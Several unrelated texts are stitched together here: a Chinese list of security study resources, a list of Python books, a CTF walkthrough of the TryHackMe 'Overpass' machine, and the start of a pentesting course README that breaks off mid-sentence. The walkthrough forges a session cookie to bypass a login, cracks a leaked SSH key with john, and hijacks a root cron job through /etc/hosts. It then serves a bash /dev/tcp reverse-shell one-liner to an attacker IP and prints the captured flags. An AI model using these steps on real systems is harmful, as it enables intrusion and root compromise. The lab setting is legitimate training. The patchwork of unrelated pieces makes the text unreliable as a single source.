美国seedsecurity资助项目,杜文亮教授出的,该书横扫网上百分之99的博客(个人观点),因为网上的博客写的大多都不详细,对于初学者的入门来说,少了一个步骤,可能就要浪费时间搜索半天(此处不考虑锻炼搜索能力,不是所有搜索都是有价值的), 该书非常详细,深入浅出,配合丰富实验,安全入门强推. ### 逆向 《C++反汇编与逆向分析技术揭秘第2版》 ### python 《python黑帽子编程》 对于安全人员是本很好的书,有丰富的实践例子,而且都是很实用的! ### 计算机网络 《图解http》 对web安全来说,http协议的重要性不言而喻,这本书用图画形式,深入浅出得讲解了http协议 ## 🌐学习网站 菜鸟教程 www.runoob.com 编程入门强烈推荐,简单易懂,例子丰富 tryhackme [https://tryhackme.com](https://tryhackme.com/dashboard) 强烈推荐新手入门和补充基础! 知识丰富,涉及红队攻防,蓝队防护,PWN,逆向,CTF等等,更新频率很高,每年都有活动.手把手0基础入门. hackthebox [https://www.hackthebox.com](https://www.hackthebox.com/) 难度中高,适合有一定基础后的渗透测试,红队、CTF进阶, [https://trailofbits.github.io/ctf/](https://trailofbits.github.io/ctf/) [https://security.ntu.st/](https://link.zhihu.com/?target=https%3A//security.ntu.st/) [https://etenal.me/archives/972#C1](https://etenal.me/archives/972#C1) [https://github.com/BrieflyX/ctf-pwns](https://github.com/BrieflyX/ctf-pwns) # 非常规学习资源 ## 学术界大佬 | 团队(排名不分先后): 关注最新学术动态,前沿领域发展,可以看到未来的方向.可以通过google scholar ,知网,学院介绍等,找到老师们的最新论文.其中许多老师是国内知名CTF战队的领队老师. ### 国内 * 方滨兴 [https://scss.bupt.edu.cn/info/1063/1160.htm](https://scss.bupt.edu.cn/info/1063/1160.htm) * 段海新 [https://www.insc.tsinghua.edu.cn/info/1181/1239.htm](https://www.insc.tsinghua.edu.cn/info/1181/1239.htm) 主页:[http://netsec.ccert.edu.cn/people/duanhx/](http://netsec.ccert.edu.cn/people/duanhx/) 研究团队:https://netsec.ccert.edu.cn/chs/people/ * 诸葛建伟(清华蓝莲花): [https://www.insc.tsinghua.edu.cn/info/1181/1272.htm](https://www.insc.tsinghua.edu.cn/info/1181/1272.htm) 主页:[http://netsec.ccert.edu.cn/chs/people/zhugejw/](http://netsec.ccert.edu.cn/chs/people/zhugejw/) * 崔宝江(北邮天枢): [https://scss.bupt.edu.cn/info/1063/1140.htm](https://scss.bupt.edu.cn/info/1063/1140.htm) * 龚晓锐(中科院NeSE) ### 国外 * 林志强教授 俄亥俄州立大学(OSU) 主页:http://web.cse.ohio-state.edu/~lin.3021/ https://www.bilibili.com/video/BV1TP4y1b7TR ## 学术资源 公众号: 网安国际 ## 安全社区 ### 二进制、逆向 吾爱破解 看雪论坛 ### web安全、渗透测试 先知社区 阿里旗下 https://wiki.freebuf.com ## 其他 v2ex 分享探索 社区 https://www.v2ex.com ## 安全团队网站 * 腾讯安全玄武实验室 [sec.today/](https://link.zhihu.com/?target=https%3A//sec.today/) * Google project zero https://googleprojectzero.blogspot.com 最新漏洞披露 [https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=&sort=-id&colspec=ID Status Restrict Reported Vendor Product Finder Summary](https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=&sort=-id&colspec=ID%20Status%20Restrict%20Reported%20Vendor%20Product%20Finder%20Summary) r3kapig: https://r3kapig.com/ ## 个人博客 pwn手 * https://xuanxuanblingbling.github.io * https://blingblingxuanxuan.github.io/ * https://blog.flanker017.me * Eastmount(csdn)、娜璋ai安全之家(公众号):博士在读,研究AI、网络安全 [https://blog.csdn.net/Eastmount](https://blog.csdn.net/Eastmount) * [http://shell-storm.org](http://shell-storm.org/) 国外大佬,还有很多shellcode样本[http://shell-storm.org/shellcode/]( http://scz.617.cn:8 不知道是哪个大佬.. http://showlinkroom.me https://eternalsakura13.com/ https://kiprey.github.io/ http://blog.eonew.cn/ https://hurricane618.me 学长的博客 http://ruanyifeng.com/blog/2018/02/docker-tutorial.html web手 https://www.leavesongs.com 离别歌 phith0n https://blog.zeddyu.info https://evoa.me/archive.html https://meizjm3i.github.io * https://www.sqlsec.com 国光,很多博客都比较详细,内容也比较新颖 独特 * https://www.leadroyal.cn http://bendawang.site/ [https://cjting.me](https://cjting.me/) 安全研究GoSSIP推荐的大佬,感觉对很多技术都研究的很透彻,研究的很深,从兴趣出发!治愈系! [http://note.taqini.space/#/README](http://note.taqini.space/#/README) http://shell-storm.org/shellcode/ [https://binhack.readthedocs.io/zh/latest/](https://binhack.readthedocs.io/zh/latest/) [https://orangegzy.github.io](https://orangegzy.github.io/) [https://beginners.re/RE4B-CN-partial/html/RE4B-CN-partial.html](https://beginners.re/RE4B-CN-partial/html/RE4B-CN-partial.html) [https://www.povcfe.site/posts/reprint/](https://www.povcfe.site/posts/reprint/) [https://iromise.com](https://iromise.com/) [https://dttw.tech/posts/ByGpq5bgt](https://dttw.tech/posts/ByGpq5bgt) [https://blog.iret.xyz/article.aspx/defcon_devops_recooord](https://blog.iret.xyz/article.aspx/defcon_devops_recooord) [https://elnx.github.io/def-con-ctf-2021/](https://elnx.github.io/def-con-ctf-2021/) [https://oooverflow.io](https://oooverflow.io/) pwn :https://ctfking.com ## 微信公众号 * 酒仙桥六号部队 (360旗下的,文章质量很高,更新频率也很高) * 安全研究GoSSIP (软件安全研究组,会推送学术论文等,日更) * 腾讯玄武实验室 (每日推送安全动态) * 唐仔橙的安全杂货铺 (我自己的!哈哈哈哈哈哈,刚刚开始做) * 山石网科安全技术研究院 (山石的官方,更新频率较快,质量也不错) * 玄道夜谈 (安全圈故事会) * 娜璋AI安全之家 (武汉大学安全博士在读,研究领域是系统安全,AI) * ## 知识星球 ## github项目 * https://github.com/PKUFlyingPig/cs-self-learning csdiy.wiki 北京大学信科的一个大佬创建的计算机自学指南网站(一本书!) gdb使用技巧 https://wizardforcel.gitbooks.io/100-gdb-tips/content/index.html ## 一些工具: Compiler Explorer 在线应用层代码转汇编 在线运行汇编 https://www.tutorialspoint.com/compile_assembly_online.php https://www.textcompare.org diff网站,比较各种内容的不同 https://gchq.github.io/CyberChef/ 解密解码工具 https://cloudconvert.com 在线格式转换 https://web.archive.org 查看历史网站记录 https://cloudconvert.com 各种文件的格式转换 https://www.ilovepdf.com pdf操作,切割等 ## 修身养性 《精力管理》 程序员延寿指南:https://github.com/geekan/HowToLiveLonger ## 其余资源获取途径 youtube Twitter # 🚩CTF专栏 上面的部分资源中也含有ctf.广义上讲,安全类的其实都可以算进来. ## 书籍 《从0到1,CTFer的成长之路》 ## CTF战队资源 清华:https://redbud.info 复旦白泽战队:知乎、微信公众号 X1cT34m: [https://ctf.njupt.edu.cn](https://ctf.njupt.edu.cn/) SU:[https://team-su.github.io](https://team-su.github.io/) 星盟:https://space.bilibili.com/489643272 有ctf培训课程 pwn已完结 、 微信公众号:星盟安全 天璇Merak: 微信公众号,有一些文章,更新较少 ## CTF学习、练习网站 CTFwiki(入门必看wiki): https://ctf-wiki.github.io/ctf-wiki/#/introduction CTFrank: https://ctfrank.org/ ctftime ctf各个比赛日程,很权威 ctfhub 攻防世界 xctf官方: https://time.xctf.org.cn i春秋 https://www.ichunqiu.com/competition buuctf https://buuoj.cn/ ctfshow https://ctf.show/challenges 看雪ctf区 bugku https://ctf.bugku.com/ 实验吧: http://www.shiyanbar.com [https://pwnable.kr](https://pwnable.kr/) PWN选手的专属 [http://pwnable.tw](http://pwnable.tw/) PWN选手的专属 [http://www.wechall.net/active_sites](http://www.wechall.net/active_sites) 一个ctf网站,同时也收录了很多学习网站 https://bbs.ctf.show/thread/47 https://bbs.pwnthebox.com/d/20/2 https://hack.zkaq.cn/。 掌控安全的,作者还未用过,暂作记录 http://www.zxsctf.com 中学生ctf gdb手册 https://sourceware.org/gdb/onlinedocs/gdb/ ### ctf导航 http://www.ctfiot.com. ChaMd5团队做的 https://ctf.mzy0.com # 参考链接: [https://zhuanlan.zhihu.com/p/49915438](https://zhuanlan.zhihu.com/p/49915438) [https://www.zhihu.com/question/397714347/answer/1252389982](https://www.zhihu.com/question/397714347/answer/1252389982) [https://zhuanlan.zhihu.com/p/429964403](https://zhuanlan.zhihu.com/p/429964403) https://eternalsakura13.com/2018/05/31/shudan/
# Awesome Python Books [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) > Directory of Python books ## Table of Contents - [Grammar](#grammar) - [Data Structures and Algorithms](#data-structures-and-algorithms) - [Game Development](#game-development) - [Hardware](#hardware) - [Machine Learning](#machine-learning) - [Deep Learning](#deep-learning) - [Natural Language Processing](#natural-language-processing) - [Network](#network) - [Science and Data Analysis](#science-and-data-analysis) - [Security](#security) - [SQL and ORMs](#sql-and-orms) - [System Administration](#system-administration) - [Testing](#testing) - [Web Development](#web-development) - [Web Scraping](#web-scraping) ## Grammar ### Zero Basis - *A Byte of Python* by Swaroop C H [English Edition](http://www.amazon.com/Byte-Python-Swaroop-C-H/dp/1514828146) - *Hello World!: Computer Programming for Kids and Other Beginners* by Warren Sande & Carter Sande [English 2nd Edition](http://www.amazon.com/Hello-World-Computer-Programming-Beginners/dp/1617290920) - *Python for Kids: A Playful Introduction to Programming* by Jason R. Briggs [English Edition](http://www.amazon.com/Python-Kids-Playful-Introduction-Programming/dp/1593274076) - *Learn Python the Hard Way* by Zed A. Shaw [English 3rd Edition](http://www.amazon.com/Learn-Python-Hard-Way-Introduction/dp/0321884914) - *Python Programming for the Absolute Beginner* by Michael Dawson [English 2nd Edition](http://www.amazon.com/Python-Programming-Absolute-Beginner-Edition/dp/1598631128) - *Introduction to Computation and Programming Using Python* by John V. Guttag [English Edition](http://www.amazon.com/Introduction-Computation-Programming-Using-Python/dp/0262525003) ### Primary - *The Quick Python Book* by Naomi Ceder [English 3rd Edition](https://www.amazon.com/Quick-Python-Book-Naomi-Ceder/dp/1617294039) - *Beginning Python: from Novice to Professional* by Magnus Lie Hetland [English 2nd Edition](http://www.amazon.com/Beginning-Python-Professional-Experts-Professionals/dp/1590599829) - *Think Python: How to Think Like a Computer Scientist* by Allen B. Downey [English 2nd Edition](http://www.amazon.com/Think-Python-Like-Computer-Scientist/dp/1491939362) - *Learning Python* by Mark Lutz [English 5th Edition](http://www.amazon.com/Learning-Python-Edition-Mark-Lutz/dp/1449355730) - *Programming Python* by Mark Lutz [English 4th Edition](http://www.amazon.com/gp/product/0596158106) - *Core Python Programming* by Wesley Chun [English 2nd Edition](http://www.amazon.com/Core-Python-Programming-Wesley-Chun/dp/0132269937) - *Python Crash Course* by Eric Matthes [English Edition](https://www.amazon.com/Python-Crash-Course-Hands-Project-Based/dp/1593276036/) - *Python Programming: An Introduction to Computer Science* by John Zelle [English 3rd Edition](http://a.co/d/gym77UH) - *Tiny Python Projects* by Ken Youens-Clark [English 1st Edition](https://www.manning.com/books/tiny-python-projects), see also [GitHub repo](https://github.com/kyclark/tiny_python_projects) ### Intermediate - *Python 3 Object-Oriented Programming* by Dusty Phillips [English 2nd Edition](https://www.amazon.com/Python-3-Object-Oriented-Programming-Second/dp/1784398780) - *The Hacker's Guide to Python* by Julien Danjou [English Edition](http://www.amazon.com/Hackers-Guide-Python-Julien-Danjou/dp/1304819248) - *Python in Practice: Create Better Programs Using Concurrency, Libraries, and Patterns* by Mark Summerfield [English Edition](http://www.amazon.com/Python-Practice-Concurrency-Libraries-Developers/dp/0321905636) - *Expert Python Programming: Best practices for designing, coding, and distributing your Python software* by Tarek Ziadé [English Edition](http://www.amazon.com/Expert-Python-Programming-practices-distributing/dp/184719494X) - *Core Python Applications Programming* by Wesley Chun [English 3rd Edition](http://www.amazon.com/Core-Python-Applications-Programming-3rd/dp/0132678209) - *Intermediate Python* [Online](http://book.pythontips.com/en/latest/) - *Effective Python: 59 Specific Ways to Write Better Python* [English Edition](https://www.amazon.com/Effective-Python-Specific-Software-Development/dp/0134034287) - *Fluent Python* by Luciano Ramalho [English Edition](http://www.amazon.com/Fluent-Python-Luciano-Ramalho/dp/1491946008) - *Learning Python Design Patterns* by Chetan Giridhar [English 2nd Edition](http://www.amazon.com/Learning-Python-Design-Patterns-Second/dp/178588803X) - *Mastering Python Design Patterns* by Sakis Kasampalis [English Edition](https://www.amazon.com/Mastering-Python-Design-Patterns-Kasampalis/dp/1783989327) - *The Well-Grounded Python Developer* by Doug Farrell [English Edition](https://www.manning.com/books/the-well-grounded-python-developer?a_aid=the_well_grounded_python_developer&a_bid=e505681b) ### Advanced - *Mastering Python High Performance* by Fernando Doglio [English Edition](https://www.amazon.com/Mastering-Python-Performance-Fernando-Doglio/dp/1783989300) - *High Performance Python: Practical Performant Programming for Humans* by Micha Gorelick [English Edition](http://www.amazon.com/High-Performance-Python-Performant-Programming/dp/1449361595) - *Cython - A Guide for Python Programmers* by Kurt W. Smith [English Edition](http://www.amazon.com/Cython-Kurt-W-Smith/dp/1491901551) - *CPython Internals: Your Guide to the Python 3 Interpreter* by Anthony Shaw [English Edition](https://www.amazon.com/CPython-Internals-Guide-Python-Interpreter/dp/1775093344) ### References - *The Python Standard Library by Example* by Doug Hellmann [English Edition](http://www.amazon.com/Python-Standard-Library-Example-Developers/dp/0321767349) - *Python Cookbook* by David Beazley & Brian K. Jones [English 3rd Edition](http://www.amazon.com/Python-Cookbook-Third-David-Beazley/dp/1449340377) - *Python Essential Reference* by David M. Beazley [English 4th Edition](http://www.amazon.com/Python-Essential-Reference-4th-Edition/dp/0672329786) - *Python in a Nutshell* by Alex Martelli [English 2nd Edition](http://www.amazon.com/Python-Nutshell-Second-Edition-In/dp/0596100469) ## Data Structures and Algorithms - *Classic Computer Science Problems in Python* by David Kopec [English Edition](https://www.manning.com/books/classic-computer-science-problems-in-python) - *Data Structures and Algorithms in Python* by Michael T. Goodrich & Roberto Tamassia & Michael H. Goldwasser [English Edition](https://www.amazon.com/Structures-Algorithms-Goodrich-Goldwasser-Hardcover/dp/B011DC80VY/) - *Problem Solving with Algorithms and Data Structures Using Python* by Bradley N. Miller & David L. Ranum [English 2nd Edition](https://www.amazon.com/Problem-Solving-Algorithms-Structures-Python/dp/1590282574) - *Python Algorithms: Mastering Basic Algorithms in the Python Language* by Magnus Lie Hetland [English 2nd Edition](http://www.amazon.com/Python-Algorithms-Mastering-Basic-Language/dp/148420056X) ## Complexity Science - *Think Complexity: Complexity Science and Computational Modeling* by Allen B. Downey [English Edition](https://www.amazon.com/Think-Complexity-Science-Computational-Modeling/dp/1449314635) ## Game Development - *Making Games with Python & Pygame* by Al Sweigart [English Edition](http://www.amazon.com/Making-Games-Python-Pygame-Sweigart/dp/1469901730) ## Hardware - *Real World Instrumentation with Python: Automated Data Acquisition and Control Systems* by John M. Hughes [English Edition](http://www.amazon.com/Real-World-Instrumentation-Python-Acquisition/dp/0596809565) ## Machine Learning - *Building Machine Learning Systems with Python* by Luis Pedro Coelho & Willi Richert [English 2nd Edition](http://www.amazon.com/Building-Machine-Learning-Systems-Python/dp/1784392774) - *Machine Learning in Action* by Peter Harrington [English Edition](http://www.amazon.com/Machine-Learning-Action-Peter-Harrington/dp/1617290181) - *Programming Collective Intelligence: Building Smart Web 2.0 Applications* by Toby Segaran [English Edition](http://www.amazon.com/Programming-Collective-Intelligence-Building-Applications/dp/0596529325) - *Python Machine Learning* by Sebastian Raschka [English Edition](http://www.amazon.com/Python-Machine-Learning-Sebastian-Raschka/dp/1783555130/ref=tmm_pap_title_0?_encoding=UTF8&qid=&sr=) - *Machine Learning: An Algorithmic Perspective* by Stephen Marsland [English 2nd Edition](https://www.amazon.com/Machine-Learning-Algorithmic-Perspective-Recognition/dp/1466583282/) ## Deep Learning - *Practical Deep Learning Book for Cloud, Mobile & Edge: Real-World AI and Computer Vision Projects Using Python, Keras and TensorFlow* by Anirudh Koul, Siddha Ganju, & Meher Kasam [[English 1st Edition](https://www.amazon.com/gp/product/149203486X?) | [Online](https://www.oreilly.com/library/view/practical-deep-learning/9781492034858/) | [GitHub](https://github.com/PracticalDL/Practical-Deep-Learning-Book)] - *Deep Learning for Coders with Fastai and PyTorch: AI Applications Without a PhD* by Jeremy Howard & Sylvain Gugger [English 1st Edition](https://www.amazon.com/Deep-Learning-Coders-fastai-PyTorch/dp/1492045527) - *Deep Learning* by Ian Goodfellow, Yoshua Bengio, Aaron Courville & Francis Bach [English 1st Edition](https://www.amazon.com/dp/0262035618) ## Natural Language Processing - *Mastering Python Regular Expressions* by Felix Lopez & Victor Romero [English Edition](http://www.amazon.com/Mastering-Python-Regular-Expressions-Felix/dp/1783283157/) - *Natural Language Processing with Python* by Steven Bird & Ewan Klein & Edward Loper [English Edition](http://www.amazon.com/Natural-Language-Processing-Python-Steven/dp/0596516495) ## Network - *Foundations of Python Network Programming* by Brandon Rhodes, John Goerzen [English 3rd Edition](https://www.amazon.com/Foundations-Python-Network-Programming-Brandon/dp/1430258543) ## Science and Data Analysis - *Data Science From Scratch: First Principles with Python* by Joel Grus [English Edition](http://www.amazon.com/Data-Science-Scratch-Principles-Python/dp/149190142X) - *Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython* by Wes McKinney [English Edition](http://www.amazon.com/Python-Data-Analysis-Wrangling-IPython/dp/1449319793) - *SciPy and NumPy: An Overview for Developers* by Eli Bressert [English Edition](http://www.amazon.com/SciPy-NumPy-Developers-Eli-Bressert/dp/1449305466) - *NumPy Beginner's Guide* by Ivan Idris [English 3rd Edition](http://www.amazon.com/Numpy-Beginners-Guide-Ivan-Idris/dp/1785281968) / [English 2nd Edition](http://www.amazon.com/NumPy-Beginners-Guide-Second-Edition/dp/1782166084) - *Python for Finance: Analyze Big Financial Data* by Yves Hilpisch [English Edition](http://www.amazon.com/Python-Finance-Analyze-Financial-Data/dp/1491945281) - *A Programmer's Guide to Data Mining* by Ron Zacharski [Online](http://guidetodatamining.com/) - *Pandas in Action* by Boris Paskhaver [English Edition](https://www.manning.com/books/pandas-in-action) ## Security - *Black Hat Python: Python Programming for Hackers and Pentesters* by Justin Seitz [English Edition](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) - *Gray Hat Python: Python Programming for Hackers and Reverse Engineers* by Justin Seitz [English Edition](http://www.amazon.com/Gray-Hat-Python-Programming-Engineers/dp/1593271921) - *Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers* by TJ O'Connor [English Edition](http://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579) ## SQL and ORMs - *Essential SQLAlchemy* by Jason Myers [English Edition](http://www.amazon.com/Essential-SQLAlchemy-Jason-Myers/dp/149191646X/) ## System Administration - *Python for Unix and Linux System Administration* by Noah Gift & Jeremy Jones [English Edition](http://www.amazon.com/Python-Unix-Linux-System-Administration/dp/0596515820) ## Testing - *Testing Python: Applying Unit Testing, TDD, BDD and Acceptance Testing* by David Sale [English Edition](http://www.amazon.com/Testing-Python-Applying-Unit-Acceptance/dp/1118901223/) ## Web Development - *Flask Web Development: Developing Web Applications with Python* by Miguel Grinberg [English Edition](http://www.amazon.com/Flask-Web-Development-Developing-Applications/dp/1449372627) - *Mastering Flask* by Jack Stouffer [English Edition](https://www.amazon.com/Mastering-Flask-Jack-Stouffer/dp/1784393657) - *Introduction to Tornado* by Michael Dory & Allison Parrish & Brendan Berg [English Edition](http://www.amazon.com/Introduction-Tornado-Michael-Dory/dp/1449309070) - *The Definitive Guide to Django* by Adrian Holovaty & Jacob Kaplan-Moss [English 2nd Edition](https://www.amazon.com/dp/143021936X/) - *Test-Driven Development with Django* by Kevin Harvey [English Edition](http://www.amazon.com/Test-Driven-Development-Django-Kevin-Harvey-ebook/dp/B00YSILNJW/) - *Test-Driven Development with Python* by Harry J. W. Percival [English Edition](http://www.amazon.com/Test-Driven-Development-Python-Harry-Percival/dp/1449364829) ## Web Scraping - *Web Scraping with Python: A Comprehensive Guide to Data Collection Solutions* by Ryan Mitchell [English Edition](http://www.amazon.com/Web-Scraping-Python-Collecting-Modern/dp/1491910291) ## Other Awesome Lists - [awesome-python](https://github.com/vinta/awesome-python) - [awesome-flask](https://github.com/humiaozuzu/awesome-flask)
### IP `10.10.128.87` # Recon ### nmap `nmap -sC -sV 10.10.128.87 -oN init.nmap` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 20:21 EDT Nmap scan report for 10.10.128.87 Host is up (0.11s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Overpass Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 42.95 seconds ``` ### gobuster `gobuster dir -u http://10.10.128.87/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.tx` ``` =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.128.87/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/03/27 20:22:28 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 0] [--> img/] /downloads (Status: 301) [Size: 0] [--> downloads/] /aboutus (Status: 301) [Size: 0] [--> aboutus/] /admin (Status: 301) [Size: 42] [--> /admin/] /css (Status: 301) [Size: 0] [--> css/] /http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /http:/www] /http%3A%2F%2Fyoutube (Status: 301) [Size: 0] [--> /http:/youtube] /http%3A%2F%2Fblogs (Status: 301) [Size: 0] [--> /http:/blogs] /http%3A%2F%2Fblog (Status: 301) [Size: 0] [--> /http:/blog] /**http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /%2A%2Ahttp:/www] Progress: 107879 / 220561 (48.91%) =============================================================== 2021/03/27 20:47:54 Finished =============================================================== ``` * `/admin` has a login page # Web ### Cookies * Looking at the page source, there is a `login.js` script: ```javascript async function postData(url = '', data = {}) { // Default options are marked with * const response = await fetch(url, { method: 'POST', // *GET, POST, PUT, DELETE, etc. cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached credentials: 'same-origin', // include, *same-origin, omit headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, redirect: 'follow', // manual, *follow, error referrerPolicy: 'no-referrer', // no-referrer, *client body: encodeFormData(data) // body data type must match "Content-Type" header }); return response; // We don't always want JSON back } const encodeFormData = (data) => { return Object.keys(data) .map(key => encodeURIComponent(key) + '=' + encodeURIComponent(data[key])) .join('&'); } function onLoad() { document.querySelector("#loginForm").addEventListener("submit", function (event) { //on pressing enter event.preventDefault() login() }); } async function login() { const usernameBox = document.querySelector("#username"); const passwordBox = document.querySelector("#password"); const loginStatus = document.querySelector("#loginStatus"); loginStatus.textContent = "" const creds = { username: usernameBox.value, password: passwordBox.value } const response = await postData("/api/login", creds) const statusOrCookie = await response.text() if (statusOrCookie === "Incorrect credentials") { loginStatus.textContent = "Incorrect Credentials" passwordBox.value="" } else { Cookies.set("SessionToken",statusOrCookie) window.location = "/admin" } } ``` * In the `login()` function, we can see that if the login response is `"Incorrect credentials"`, we don't get logged in. * However, if it is correct, the `SessionToken` is set to the status. * Thus, we can deduce that creating a cookie called `SessionToken` and setting the value to `Correct credentials` will log us in. * Doing this in the `Application > Cookie` tab in Chrome (or the `EditThisCookie` extension), we can log in. * Once we make the fake cookie, we see the following on the page: ``` Since you keep forgetting your password, James, I've set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you. Also, we really need to talk about this "Military Grade" encryption. - Paradox -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ 4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8 GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7 -----END RSA PRIVATE KEY----- ``` # SSH * This has a password. We can crack it with john ### John * `ssh2john key > key.john` gives us a crackable hash * Then we can crack it with `john key.john --worlist=/usr/share/wordlists/rockyou.txt` ``` Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status james13 (key) ``` * Now we can now change the key permissions with `chmod 600 key` and log in with `ssh [email protected] -i key` (the username was a guess) * `cat user.txt` gives us the user flag: `thm{65c1aaf000506e56996822c6281e6bf7}` # Privesc ### Linpeas * We can run `python3 -m http.server 80` locally and `wget http://10.6.35.105/linpeas.sh` remotely to download linpeas * When we run it, we can see a cronjob that runs a bash script as root every minute: ``` * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash ``` * Because it is looking at `overpass.thm` instead of an actual ip, we can edit `/etc/hosts` to have our ip instead of `127.0.0.1`: `/etc/hosts/` ``` 10.6.36.105 overpass.thm ``` * Now, we can create the files and directories locally and make the script that runs a reverse shell: `/downloads/src/buildscript.sh` ``` bash -i >& /dev/tcp/10.6.36.105/1337 0>&1 ``` * We can host this on our system with `python3 -m http.server 80` and set up a listener with `nc -lvnp 1337` * After about a minute, we get a reverse shell as root * `cat root.txt` gets the root flag: `thm{7f336f8c359dbac18d54fdd64ea753bb}`
# Course Overview Welcome to the Beginner Network Pentesting course. Previously, the course was delivered weekly on Twitch and built from lessons learned in the previous week. The course provides an opportunity for those interested in becoming an ethical hacker / penetration tester the chance to learn the practical skills necessary to work in the field. Throughout the course, we will develop our own Active Directory lab in Windows, make it vulnerable, hack it, and patch it. We'll cover the red and blue sides. We'll also cover some of the boring stuff like report writing :). The full course can be found here: https://youtu.be/WnN6dbos5u8 All individual videos can be found on YouTube at https://www.youtube.com/watch?v=qlK174d_uu8&list=PLLKT__MCUeiwBa7d7F_vN1GUwz_2TmVQj or on my website at https://www.thecybermentor.com/zero-to-hero-pentesting. All homework and e-mails that were sent during the course are stored in their corresponding "week" folders (e.g. Week 5's homework is in the "Week 5" folder). Below, you will find a lesson plan detailing everything that we covered in the course by week. If you're following along with the course and have questions, feel free to join the 